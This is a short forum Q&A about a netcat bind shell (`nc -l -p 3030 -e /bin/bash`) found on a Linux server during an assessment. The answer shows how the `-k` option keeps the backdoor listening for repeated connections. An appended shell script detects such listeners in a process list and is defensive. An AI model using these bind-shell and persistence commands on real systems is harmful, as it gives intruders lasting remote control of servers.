
I have found the following command several times on one of the Linux servers during an assessment:

nc -l -p 3030 -e /bin/bash

This enables a hacker to gain control over this server via bash. By testing it, I realized that whenever the client interrupts the connection, the door is closed again.

Is there a way for the hacker to keep this door persistently open?

Anders
Bob

1 Answer

nc with the -k option will help.

nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash

Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the -l option. When used together with the -u option, the server socket is not connected and it can receive UDP datagrams from multiple hosts.

Anders
sourav punoriyar
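
For the assessment side of this thread, a way to spot such listeners in a process list, as an added example that is not part of the original question or answer. The function name `flag_nc_listeners` and the sample process list are constructed for illustration; the check reports whether `-k` makes the listener survive a disconnect.

```shell
#!/bin/sh
# Added example: flag nc/ncat/netcat listeners that were started with an
# exec option. Input lines use `ps -eo pid=,args=` format (PID, then argv).
flag_nc_listeners() {
    awk '
    {
        n = split($2, parts, "/"); exe = parts[n]      # basename of argv[0]
        if (exe !~ /^(nc|ncat|netcat|nc\.traditional)$/) next
        listen = 0; ex = 0; keep = 0; port = "?"
        for (i = 3; i <= NF; i++) {
            a = $i
            if (a == "--listen") listen = 1
            else if (a == "--keep-open") keep = 1
            else if (a == "--exec" || a == "--sh-exec") ex = 1
            else if (a ~ /^-[A-Za-z]+$/) {             # short options, e.g. -l or -lkp
                if (a ~ /l/) listen = 1
                if (a ~ /k/) keep = 1
                if (a ~ /[ec]/) ex = 1                 # -e, or -c in nc.traditional and ncat
                if (a ~ /p$/ && i < NF) port = $(i + 1)
            }
        }
        if (listen && ex) {
            printf "%s port=%s persistent=%s\n", $1, port, (keep ? "yes" : "no")
        }
    }'
}

# Constructed sample process list (not taken from a real host).
sample_ps() {
    cat <<'EOF'
  812 /usr/sbin/sshd -D
 1201 nc -l -p 3030 -e /bin/bash
 1344 nc -l -k -p 3030 -e /bin/bash
 1502 nc -lkp 4444 -e /bin/sh
 1777 nc -zv 10.0.0.5 22
 1810 nc -lk -p 8080
EOF
}

sample_ps | flag_nc_listeners
```

On a live Linux host, pipe `ps -eo pid=,args=` into the function instead of the sample. The piped form `nc -l -k -p 3030 | /bin/bash` carries no exec flag in nc's own arguments, so it needs a separate review of listening sockets.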